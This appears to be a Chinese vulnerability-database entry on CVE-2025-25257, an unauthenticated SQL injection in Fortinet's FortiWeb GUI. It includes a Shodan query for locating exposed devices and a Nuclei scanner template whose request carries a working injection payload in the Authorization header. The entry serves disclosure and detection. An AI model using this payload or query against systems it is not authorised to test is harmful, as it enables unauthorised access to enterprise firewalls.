FortiWeb GUI 未授权SQL注入漏洞

漏洞信息

漏洞名称： FortiWeb GUI 未授权SQL注入漏洞

漏洞编号：

• CVE： CVE-2025-25257

漏洞类型： SQL注入

漏洞等级： 严重

漏洞描述： FortiWeb是Fortinet公司提供的一款Web应用防火墙（WAF），旨在保护Web应用免受各种网络攻击，如SQL注入、跨站脚本（XSS）等。它广泛应用于企业级环境中，用于保护关键的Web应用和服务。此次发现的漏洞涉及FortiWeb的图形用户界面（GUI），存在未授权SQL注入漏洞。该漏洞的技术根源在于FortiWeb未能正确中和SQL命令中使用的特殊元素（CWE-89），导致攻击者可以通过精心构造的HTTP或HTTPS请求执行未经授权的SQL代码或命令。由于这是一个未授权漏洞，攻击者无需任何认证即可利用此漏洞，极大地增加了攻击的风险和便利性。成功利用此漏洞可能导致攻击者执行任意SQL命令，进而可能导致数据泄露、数据篡改、服务中断等严重后果。鉴于FortiWeb在企业环境中的广泛使用，此漏洞的影响范围可能非常广泛，建议相关用户尽快采取措施进行防护。

产品厂商： Fortinet

产品名称： FortiWeb

搜索语法： ssl:”cn=fortiweb”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/f705fc10ae2eeea05b07a7eccab2157b4d157c24/http%2Fcves%2F2025%2FCVE-2025-25257.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-25257

info:
  name: Unauthenticated SQL injection in FortiWeb GUI
  author: watchtowr,johnk3r
  severity: critical
  description: An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in FortiWeb may allow an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests.
  reference:
    - https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/
    - https://fortiguard.fortinet.com/psirt/FG-IR-25-151
  metadata:
    verified: true
    max-request: 1
    shodan-query: ssl:"cn=fortiweb"
  tags: cve,2025,fortinet,fortiweb

http:
  - raw:
      - |
        GET /api/fabric/device/status HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer AAAAAA'or'1'='1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'serial'
          - 'fortiweb'

      - type: status
        status:
          - 200